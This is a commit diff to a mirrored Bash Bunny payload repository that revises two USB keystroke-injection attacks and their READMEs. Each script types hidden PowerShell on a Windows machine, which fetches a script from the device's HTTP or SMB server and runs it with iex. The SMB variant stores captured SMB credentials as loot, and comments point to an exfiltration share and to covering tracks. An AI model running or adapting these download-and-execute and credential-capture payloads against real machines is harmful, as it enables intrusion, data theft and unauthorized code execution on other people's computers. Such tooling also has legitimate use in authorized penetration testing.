mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
cleaned up and extended
This commit is contained in:
Hink
@@ -8,7 +8,8 @@
|
|||||||
# Attackmodes: HID, RNDIS_ETHERNET
|
# Attackmodes: HID, RNDIS_ETHERNET
|
||||||
# Firmware: >= 1.3
|
# Firmware: >= 1.3
|
||||||
#
|
#
|
||||||
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
|
# Quick HID attack to retrieve and run powershell payload from BashBunny web server
|
||||||
|
# ensure p.txt (your powershell payload) exists in payload directory
|
||||||
#
|
#
|
||||||
# | Attack Stage | Description |
|
# | Attack Stage | Description |
|
||||||
# | ------------------- | ---------------------------------------- |
|
# | ------------------- | ---------------------------------------- |
|
||||||
@@ -18,41 +19,38 @@
|
|||||||
|
|
||||||
ATTACKMODE RNDIS_ETHERNET HID
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
REQUIRETOOL gohttp
|
||||||
|
|
||||||
GET HOST_IP
|
GET HOST_IP
|
||||||
GET SWITCH_POSITION
|
GET SWITCH_POSITION
|
||||||
|
|
||||||
# Set working dir
|
# DEFINE DIRECTORIES
|
||||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
|
||||||
SERVER_LOG=$PAYLOAD_DIR/server.log
|
SERVER_LOG=/tmp/server.log
|
||||||
|
|
||||||
# Fresh Server Log
|
# SERVER LOG
|
||||||
rm -f $SERVER_LOG
|
rm -f ${SERVER_LOG}
|
||||||
|
|
||||||
# Check for gohttp
|
# START HTTP SERVER
|
||||||
REQUIRETOOL gohttp
|
|
||||||
|
|
||||||
# Start web server
|
|
||||||
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
|
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
|
||||||
/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
|
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
|
||||||
|
|
||||||
# Check for psh.txt
|
# CHECK FOR POWERSHELL
|
||||||
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
|
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
|
||||||
LED FAIL2
|
LED FAIL2
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
|
||||||
|
|
||||||
# Attack HID
|
# STAGE 1 - POWERSHELL
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
|
|
||||||
# Attack (abbreviations to allow run execution)
|
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
|
||||||
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
|
|
||||||
# Remove tracks in the psh payload if you wish
|
# Remove tracks in the psh payload if you wish
|
||||||
|
|
||||||
# Attack Ethernet
|
# STAGE 2 - WAIT
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
|
while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
|
||||||
while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
|
|
||||||
sleep .5
|
sleep .5
|
||||||
done
|
done
|
||||||
|
|
||||||
|
|||||||
@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
|
|||||||
|
|
||||||
## Configuration
|
## Configuration
|
||||||
|
|
||||||
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||||
|
|
||||||
## Requirements
|
## Requirements
|
||||||
|
|
||||||
|
|||||||
@@ -2,23 +2,23 @@
|
|||||||
#
|
#
|
||||||
# Title: Powershell Download and Execute SMB
|
# Title: Powershell Download and Execute SMB
|
||||||
# Author: LowValueTarget
|
# Author: LowValueTarget
|
||||||
# Version: 1.2
|
# Version: 2.0
|
||||||
# Category: Powershell
|
# Category: Powershell
|
||||||
# Target: Windows XP SP3+ (Powershell)
|
# Target: Windows XP SP3+ (Powershell)
|
||||||
# Attackmodes: HID, RNDIS_ETHERNET
|
# Attackmodes: HID, RNDIS_ETHERNET
|
||||||
# Firmware: >= 1.2
|
# Firmware: >= 1.2
|
||||||
#
|
#
|
||||||
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
|
||||||
# Ensure psh.txt exists in payload directory
|
# Credentials captured by are stored as loot.
|
||||||
|
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
|
||||||
#
|
#
|
||||||
# Requires Impacket is installed (python ./impacket/setup.py install)
|
# Required tools: impacket
|
||||||
#
|
#
|
||||||
# | Attack Stage | Description |
|
# | Attack Stage | Description |
|
||||||
# | ------------------- | ------------------------------|
|
# | ------------------- | ------------------------------|
|
||||||
# | Stage 1 | Powershell |
|
# | Stage 1 | Powershell |
|
||||||
# | Stage 2 | Delivering powershell payload |
|
# | Stage 2 | Delivering powershell payload |
|
||||||
#
|
#
|
||||||
|
|
||||||
ATTACKMODE RNDIS_ETHERNET HID
|
ATTACKMODE RNDIS_ETHERNET HID
|
||||||
|
|
||||||
# SETUP
|
# SETUP
|
||||||
@@ -29,48 +29,48 @@ GET SWITCH_POSITION
|
|||||||
GET TARGET_HOSTNAME
|
GET TARGET_HOSTNAME
|
||||||
GET HOST_IP
|
GET HOST_IP
|
||||||
|
|
||||||
|
# DEFINE DIRECTORIES
|
||||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||||
# Check for psh.txt
|
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
|
||||||
if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
|
|
||||||
|
mkdir -p /tmp/{l,p}
|
||||||
|
|
||||||
|
# CHECK FOR POWERSHELL
|
||||||
|
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
|
||||||
LED FAIL
|
LED FAIL
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
cp -R ${PAYLOAD_DIR}/* /tmp/
|
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
|
||||||
|
|
||||||
LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
|
# GET HOSTNAME
|
||||||
# Setup named logs in loot directory
|
|
||||||
mkdir -p ${LOOTDIR}
|
|
||||||
HOST=${TARGET_HOSTNAME}
|
HOST=${TARGET_HOSTNAME}
|
||||||
# If hostname is blank set it to "noname"
|
[[ -z "${HOST}" ]] && HOST="noname"
|
||||||
[[ -z "$HOST" ]] && HOST="noname"
|
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
|
||||||
COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
|
|
||||||
COUNT=$((COUNT+1))
|
COUNT=$((COUNT+1))
|
||||||
mkdir -p ${LOOTDIR}/${HOST}-$COUNT
|
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
|
||||||
|
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
|
||||||
|
|
||||||
# Log file
|
# START SMB SERVER
|
||||||
LOGFILE=psh_smb.log
|
LOGFILE=/tmp/l/psh_downloadsmb.log
|
||||||
|
touch ${LOGFILE}
|
||||||
|
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
|
||||||
|
|
||||||
# Start SMB Server
|
# STAGE 1 - POWERSHELL
|
||||||
mkdir -p /loot
|
|
||||||
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
|
|
||||||
|
|
||||||
# STAGE 1 - Powershell
|
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
|
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
|
||||||
|
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
|
||||||
|
# TIP: Remove tracks in the psh payload if you wish
|
||||||
|
|
||||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
|
# STAGE 2 - HURRY UP AND WAIT
|
||||||
# Remove tracks in the psh payload if you wish
|
|
||||||
|
|
||||||
# STAGE 2 - Wait until payload retrieved
|
|
||||||
# Wait until payload is retrieved
|
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
|
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
|
||||||
|
|
||||||
# CLEANUP
|
# CLEANUP
|
||||||
LED CLEANUP
|
LED CLEANUP
|
||||||
|
|
||||||
# Move loot to mass storage
|
# STASH THE LOOT
|
||||||
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
|
mv /tmp/l/* ${LOOTDIR_BB}/
|
||||||
rm /loot/${LOGFILE}
|
rm -rf /tmp/{l,p}
|
||||||
# Sync file system
|
# Sync file system
|
||||||
sync
|
sync
|
||||||
|
|
||||||
|
|||||||
@@ -10,12 +10,16 @@
|
|||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.
|
||||||
|
|
||||||
## Configuration
|
## Configuration
|
||||||
|
|
||||||
* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||||
* Requires Impacket is installed (python ./impacket/setup.py install)
|
* Requires Impacket
|
||||||
|
|
||||||
|
__Installation__
|
||||||
|
|
||||||
|
See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
|
||||||
|
|
||||||
## STATUS
|
## STATUS
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user